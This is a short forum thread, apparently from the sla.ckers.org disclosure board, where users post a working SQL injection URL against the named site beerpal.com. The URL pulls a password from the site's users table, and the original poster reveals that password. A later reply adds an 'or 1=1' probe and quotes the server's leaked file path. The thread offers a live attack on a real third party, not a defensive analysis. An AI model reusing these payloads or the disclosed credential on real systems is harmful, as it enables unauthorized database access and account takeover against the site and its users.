Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
beerpal.com vulnerable to sql injection
Posted by: FOLD
Date: July 15, 2007 12:38PM

Check it out... :P

http://www.beerpal.com/compass/userreviews.asp?UID=-1%20union%20select%20password%20from%20users%20where%20id=1

"jack" being the password.

Options: ReplyQuote
Re: beerpal.com vulnerable to sql injection
Posted by: goku12205
Date: October 11, 2009 11:27PM

i thought when u use sql ijections on the site the url has to be index.php?= or index.perl?=???

but nice

Options: ReplyQuote
Re: beerpal.com vulnerable to sql injection
Posted by: id
Date: October 12, 2009 07:05PM

Maybe you should just stay the hell away from a BEER site! Go pick on a orphanage or something!

-id

Options: ReplyQuote
Re: beerpal.com vulnerable to sql injection
Posted by: _sniff
Date: October 13, 2009 06:57AM

this site is giving way too much information than expected.
for a 404 error.
Requested URL http://www.beerpal.com:80/Beer-Compass.htm/userreviews.asp?UID=1%20or%201=1
Physical Path C:\inetpub\vhosts\beerpal.com\httpdocs\Beer-Compass.htm\userreviews.asp
Logon Method Anonymous
Logon User Anonymous



Physical path and all


I believe they are trying their best to give all the information to guyz out there.

- sn|ff

Options: ReplyQuote


Sorry, only registered users may post in this forum.